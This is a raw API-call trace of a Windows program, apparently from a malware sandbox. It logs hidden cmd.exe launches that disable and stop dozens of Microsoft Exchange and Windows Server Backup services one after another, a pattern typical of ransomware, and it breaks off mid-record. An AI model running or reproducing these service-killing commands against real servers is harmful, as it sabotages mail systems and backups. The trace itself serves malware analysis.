[0133.563] CloseHandle (hObject=0x1f4) returned 1 [0133.563] CloseHandle (hObject=0x1f0) returned 1 [0133.563] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0133.563] _mbscat (in: param_1=0x29fb50, param_2=0x2881ad8 | out: param_1=0x29fb50) returned 0x29fb50 [0133.563] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeSA start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeSA start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd44, dwThreadId=0xd14)) returned 1 [0133.570] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0133.793] CloseHandle (hObject=0x1f4) returned 1 [0133.793] CloseHandle (hObject=0x1f0) returned 1 [0133.793] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0133.793] _mbscat (in: param_1=0x29fb50, param_2=0x2887160 | out: param_1=0x29fb50) returned 0x29fb50 [0133.793] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeThrottling start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeThrottling start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd84, dwThreadId=0xd90)) returned 1 [0133.800] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0134.019] CloseHandle (hObject=0x1f4) returned 1 [0134.019] CloseHandle (hObject=0x1f0) returned 1 [0134.019] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0134.019] _mbscat (in: param_1=0x29fb50, param_2=0x2887080 | out: param_1=0x29fb50) returned 0x29fb50 [0134.019] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeTransport start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeTransport start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd64, dwThreadId=0xb30)) returned 1 [0134.026] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0134.246] CloseHandle (hObject=0x1f4) returned 1 [0134.246] CloseHandle (hObject=0x1f0) returned 1 [0134.246] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0134.246] _mbscat (in: param_1=0x29fb50, param_2=0x28838a8 | out: param_1=0x29fb50) returned 0x29fb50 [0134.246] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeTransportLogSearch start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeTransportLogSearch start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xdcc, dwThreadId=0xd54)) returned 1 [0134.253] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0134.542] CloseHandle (hObject=0x1f4) returned 1 [0134.542] CloseHandle (hObject=0x1f0) returned 1 [0134.542] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0134.542] _mbscat (in: param_1=0x29fb50, param_2=0x28871d0 | out: param_1=0x29fb50) returned 0x29fb50 [0134.542] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc config MSExchangeADTopology start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c sc config MSExchangeADTopology start= disabled", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xdd4, dwThreadId=0xdc8)) returned 1 [0134.549] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0134.768] CloseHandle (hObject=0x1f4) returned 1 [0134.768] CloseHandle (hObject=0x1f0) returned 1 [0134.768] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0134.768] _mbscat (in: param_1=0x29fb50, param_2=0x28823e8 | out: param_1=0x29fb50) returned 0x29fb50 [0134.768] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeAB", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeAB", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xdb0, dwThreadId=0x394)) returned 1 [0134.776] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0135.067] CloseHandle (hObject=0x1f4) returned 1 [0135.067] CloseHandle (hObject=0x1f0) returned 1 [0135.067] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0135.067] _mbscat (in: param_1=0x29fb50, param_2=0x2881898 | out: param_1=0x29fb50) returned 0x29fb50 [0135.067] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeAntispamUpdate", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeAntispamUpdate", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x210, dwThreadId=0xd18)) returned 1 [0135.074] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0135.430] CloseHandle (hObject=0x1f4) returned 1 [0135.430] CloseHandle (hObject=0x1f0) returned 1 [0135.430] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0135.430] _mbscat (in: param_1=0x29fb50, param_2=0x60ebe0 | out: param_1=0x29fb50) returned 0x29fb50 [0135.430] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeEdgeSync", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeEdgeSync", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x420, dwThreadId=0x544)) returned 1 [0135.437] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0135.721] CloseHandle (hObject=0x1f4) returned 1 [0135.721] CloseHandle (hObject=0x1f0) returned 1 [0135.721] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0135.721] _mbscat (in: param_1=0x29fb50, param_2=0x28820a8 | out: param_1=0x29fb50) returned 0x29fb50 [0135.721] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeFDS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeFDS", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe84, dwThreadId=0xee8)) returned 1 [0135.728] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0136.040] CloseHandle (hObject=0x1f4) returned 1 [0136.040] CloseHandle (hObject=0x1f0) returned 1 [0136.041] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0136.041] _mbscat (in: param_1=0x29fb50, param_2=0x28820e8 | out: param_1=0x29fb50) returned 0x29fb50 [0136.041] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeFBA", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeFBA", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe74, dwThreadId=0xf1c)) returned 1 [0136.049] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0136.412] CloseHandle (hObject=0x1f4) returned 1 [0136.412] CloseHandle (hObject=0x1f0) returned 1 [0136.412] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0136.412] _mbscat (in: param_1=0x29fb50, param_2=0x60ed20 | out: param_1=0x29fb50) returned 0x29fb50 [0136.412] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeImap4", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeImap4", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xef8, dwThreadId=0xf44)) returned 1 [0136.418] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0136.787] CloseHandle (hObject=0x1f4) returned 1 [0136.787] CloseHandle (hObject=0x1f0) returned 1 [0136.787] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0136.787] _mbscat (in: param_1=0x29fb50, param_2=0x2882248 | out: param_1=0x29fb50) returned 0x29fb50 [0136.787] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeIS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeIS", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe34, dwThreadId=0xf48)) returned 1 [0136.794] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0137.089] CloseHandle (hObject=0x1f4) returned 1 [0137.089] CloseHandle (hObject=0x1f0) returned 1 [0137.089] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0137.089] _mbscat (in: param_1=0x29fb50, param_2=0x2881748 | out: param_1=0x29fb50) returned 0x29fb50 [0137.089] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeMailSubmission", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeMailSubmission", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x854, dwThreadId=0xf28)) returned 1 [0137.096] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0137.439] CloseHandle (hObject=0x1f4) returned 1 [0137.439] CloseHandle (hObject=0x1f0) returned 1 [0137.439] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0137.439] _mbscat (in: param_1=0x29fb50, param_2=0x2888118 | out: param_1=0x29fb50) returned 0x29fb50 [0137.439] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeMailboxAssistants", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeMailboxAssistants", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x824, dwThreadId=0xbfc)) returned 1 [0137.446] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0137.787] CloseHandle (hObject=0x1f4) returned 1 [0137.787] CloseHandle (hObject=0x1f0) returned 1 [0137.787] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0137.787] _mbscat (in: param_1=0x29fb50, param_2=0x28880e8 | out: param_1=0x29fb50) returned 0x29fb50 [0137.787] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeMailboxReplication", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeMailboxReplication", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xf68, dwThreadId=0xf78)) returned 1 [0137.795] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0138.091] CloseHandle (hObject=0x1f4) returned 1 [0138.091] CloseHandle (hObject=0x1f0) returned 1 [0138.091] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0138.091] _mbscat (in: param_1=0x29fb50, param_2=0x60ef00 | out: param_1=0x29fb50) returned 0x29fb50 [0138.091] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeMonitoring", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeMonitoring", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xfa0, dwThreadId=0xfec)) returned 1 [0138.098] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0138.445] CloseHandle (hObject=0x1f4) returned 1 [0138.445] CloseHandle (hObject=0x1f0) returned 1 [0138.445] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0138.445] _mbscat (in: param_1=0x29fb50, param_2=0x2888e90 | out: param_1=0x29fb50) returned 0x29fb50 [0138.445] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangePop3", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangePop3", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xfc0, dwThreadId=0xfe4)) returned 1 [0138.451] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0138.734] CloseHandle (hObject=0x1f4) returned 1 [0138.734] CloseHandle (hObject=0x1f0) returned 1 [0138.734] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0138.734] _mbscat (in: param_1=0x29fb50, param_2=0x2888178 | out: param_1=0x29fb50) returned 0x29fb50 [0138.734] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeProtectedServiceHost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeProtectedServiceHost", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x9ec, dwThreadId=0xfc4)) returned 1 [0138.741] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0139.041] CloseHandle (hObject=0x1f4) returned 1 [0139.041] CloseHandle (hObject=0x1f0) returned 1 [0139.041] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0139.041] _mbscat (in: param_1=0x29fb50, param_2=0x2888f70 | out: param_1=0x29fb50) returned 0x29fb50 [0139.041] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeRepl", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeRepl", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xc1c, dwThreadId=0xc38)) returned 1 [0139.049] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0139.403] CloseHandle (hObject=0x1f4) returned 1 [0139.403] CloseHandle (hObject=0x1f0) returned 1 [0139.403] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0139.403] _mbscat (in: param_1=0x29fb50, param_2=0x2888e10 | out: param_1=0x29fb50) returned 0x29fb50 [0139.404] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeRPC", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeRPC", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xc9c, dwThreadId=0xd00)) returned 1 [0139.410] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0139.697] CloseHandle (hObject=0x1f4) returned 1 [0139.697] CloseHandle (hObject=0x1f0) returned 1 [0139.697] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0139.697] _mbscat (in: param_1=0x29fb50, param_2=0x60ec30 | out: param_1=0x29fb50) returned 0x29fb50 [0139.697] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeSearch", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeSearch", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x42c, dwThreadId=0xcb4)) returned 1 [0139.705] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0139.999] CloseHandle (hObject=0x1f4) returned 1 [0139.999] CloseHandle (hObject=0x1f0) returned 1 [0139.999] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0139.999] _mbscat (in: param_1=0x29fb50, param_2=0x2888d10 | out: param_1=0x29fb50) returned 0x29fb50 [0139.999] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop wsbexchange", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 